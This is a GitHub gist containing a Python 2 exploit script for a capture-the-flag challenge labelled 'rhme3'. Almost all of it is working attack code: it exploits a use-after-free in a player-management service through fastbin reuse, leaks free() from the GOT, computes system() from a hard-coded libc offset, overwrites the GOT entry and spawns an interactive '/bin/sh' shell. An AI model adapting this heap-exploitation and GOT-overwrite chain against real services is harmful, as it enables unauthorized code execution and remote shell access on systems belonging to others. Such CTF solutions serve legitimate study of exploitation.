Created
September 1, 2017 23:05
-
-
Save bkth/91d4fc13d99e05a6f4ef0710909d81aa to your computer and use it in GitHub Desktop.
rhme3 exploit chall
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
import time | |
import telnetlib | |
import sys | |
import binascii | |
import struct | |
import socket | |
HOST = "127.0.0.1" if len(sys.argv) < 2 else sys.argv[1] | |
PORT = 1337 if len(sys.argv) < 2 else int(sys.argv[2]) | |
TARGET = (HOST, PORT) | |
sock=socket.create_connection(TARGET) | |
def ru(delim): | |
buf = "" | |
while not buf.endswith(delim): | |
buf += sock.recv(1) | |
return buf | |
def interact(): | |
print "[*] interact now" | |
t=telnetlib.Telnet() | |
t.sock = sock | |
t.interact() | |
p32 = lambda v: struct.pack("<I", v) | |
p64 = lambda v: struct.pack("<Q", v) | |
u32 = lambda v: struct.unpack("<I", v)[0] | |
u64 = lambda v: struct.unpack("<Q", v)[0] | |
def recv_menu(): | |
return ru("Your choice: ") | |
def add_player(name, a, d, s, p): | |
sock.sendall("1\n") | |
ru("name: ") | |
sock.sendall(name + "\n") | |
ru("points: ") | |
sock.sendall(str(a) + "\n") | |
ru("points: ") | |
sock.sendall(str(d) + "\n") | |
ru("speed: ") | |
sock.sendall(str(s) + "\n") | |
ru("precision: ") | |
sock.sendall(str(p) + "\n") | |
def select(index): | |
sock.sendall("3\n") | |
ru("index: ") | |
sock.sendall(str(index) + "\n") | |
def delete(index): | |
sock.sendall("2\n") | |
ru("index: ") | |
sock.sendall(str(index) + "\n") | |
def info(s): | |
print "[*] %s" % s | |
info("pwning on %s:%d" % (HOST, PORT)) | |
heap = 0 | |
def pwn(): | |
global heap | |
add_player("A"*0x88,1,2,3,4) | |
recv_menu() | |
add_player("/bin/sh;#" + "A"*(0x88-9),1,2,3,4) | |
recv_menu() | |
add_player("D"*0x17,32,32,32,32) # will allocate struct2 | |
recv_menu() | |
select(2) | |
delete(2) # this causes fastbin[0x18] = [&struct2, &struct2->name] | |
recv_menu() | |
delete(0) # this causes fastbin[0x18] = [&struct0, &struct2, &struct2->name] | |
recv_menu() | |
add_player("A"*0x10 + p64(0x603018),5,5,5,5) # this will reallocate &struct0 to hold the player structure and &struct2 for the name | |
recv_menu() | |
# leak the address of free and compute the address of system from it | |
sock.sendall("5\n") | |
ru("Name: ") | |
free_libc = u64(ru("\n")[:-1].ljust(8,"\0")) | |
info("free at 0x%x" % free_libc) | |
system = free_libc - 0x3f160 | |
info("system at 0x%x" % system) | |
# overwrite the address of free in the GOT with the address of system | |
sock.sendall("4\n") | |
ru("choice: ") | |
sock.sendall("1\n") | |
ru("name: ") | |
sock.sendall(p64(system) + "\n") | |
recv_menu() | |
sock.sendall("0\n") | |
# trigger a call to system on our controlled string /bin/sh;# | |
delete(1) | |
interact() | |
recv_menu() | |
pwn() |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment